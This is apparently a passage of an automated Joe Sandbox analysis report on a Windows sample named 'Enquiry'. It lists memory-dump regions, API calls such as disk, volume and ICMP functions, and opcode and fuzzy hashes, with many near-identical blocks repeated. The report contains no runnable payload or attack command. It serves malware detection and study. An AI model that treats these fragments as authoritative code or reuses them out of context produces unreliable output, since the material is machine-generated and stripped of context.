                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Library$AddressFreeLoadProc
                            • String ID: AU3_GetPluginDetails
                            • API String ID: 145871493-4132174516
                            • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                            • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                            • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                            • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                            APIs
                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: MessageSend$Window
                            • String ID: SysMonthCal32
                            • API String ID: 2326795674-1439706946
                            • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                            • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                            • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                            • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                            APIs
                            • DestroyWindow.USER32(00000000), ref: 00450A2F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: DestroyWindow
                            • String ID: msctls_updown32
                            • API String ID: 3375834691-2298589950
                            • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                            • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                            • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                            • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID: $<
                            • API String ID: 4104443479-428540627
                            • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                            • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                            • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                            • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ErrorMode$DiskFreeSpace
                            • String ID: \VH
                            • API String ID: 1682464887-234962358
                            • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                            • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                            • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                            • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ErrorMode$DiskFreeSpace
                            • String ID: \VH
                            • API String ID: 1682464887-234962358
                            • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                            • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                            • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                            • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ErrorMode$DiskFreeSpace
                            • String ID: \VH
                            • API String ID: 1682464887-234962358
                            • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                            • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                            • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                            • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ErrorMode$InformationVolume
                            • String ID: \VH
                            • API String ID: 2507767853-234962358
                            • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                            • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                            • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                            • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ErrorMode$InformationVolume
                            • String ID: \VH
                            • API String ID: 2507767853-234962358
                            • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                            • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                            • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                            • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                            APIs
                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                            • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID: msctls_trackbar32
                            • API String ID: 3850602802-1010561917
                            • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                            • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                            • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                            • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                            APIs
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                            • String ID: crts
                            • API String ID: 943502515-3724388283
                            • Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                            • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                            • Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                            • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                            APIs
                              • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                            • CoInitialize.OLE32(00000000), ref: 0046E505
                            • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                            • CoUninitialize.OLE32 ref: 0046E53D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                            • String ID: .lnk
                            • API String ID: 886957087-24824748
                            • Opcode ID: ca4e97b0deac3c583c427a3e57c18447ee07ba297a7231e98f3a70961bae8bd6
                            • Instruction ID: 8523b4f55483354ee3aaa8e7e2ee5f8b04597d59409be9d2747526508be4cfd1
                            • Opcode Fuzzy Hash: ca4e97b0deac3c583c427a3e57c18447ee07ba297a7231e98f3a70961bae8bd6
                            • Instruction Fuzzy Hash: E72183312082009FD700EF55C985F4AB7F4AF88729F14866EF9589B2E1D7B4E804CB56
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                            • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                            • SetErrorMode.KERNEL32(?), ref: 0045D35C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ErrorMode$LabelVolume
                            • String ID: \VH
                            • API String ID: 2006950084-234962358
                            • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                            • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                            • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                            • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                            APIs
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • GetMenuItemInfoW.USER32 ref: 00449727
                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                            • DrawMenuBar.USER32 ref: 00449761
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Menu$InfoItem$Draw_malloc
                            • String ID: 0
                            • API String ID: 772068139-4108050209
                            • Opcode ID: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                            • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                            • Opcode Fuzzy Hash: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                            • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _wcslen$_wcscpy
                            • String ID: 3, 3, 8, 1
                            • API String ID: 3469035223-357260408
                            • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                            • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                            • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                            • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                            APIs
                            • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                            • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: ICMP.DLL$IcmpCloseHandle
                            • API String ID: 2574300362-3530519716
                            • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                            • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                            • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                            • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                            APIs
                            • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                            • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: ICMP.DLL$IcmpCreateFile
                            • API String ID: 2574300362-275556492
                            • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                            • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                            • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                            • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                            APIs
                            • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                            • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                            Strings
                            Memory Dump Source
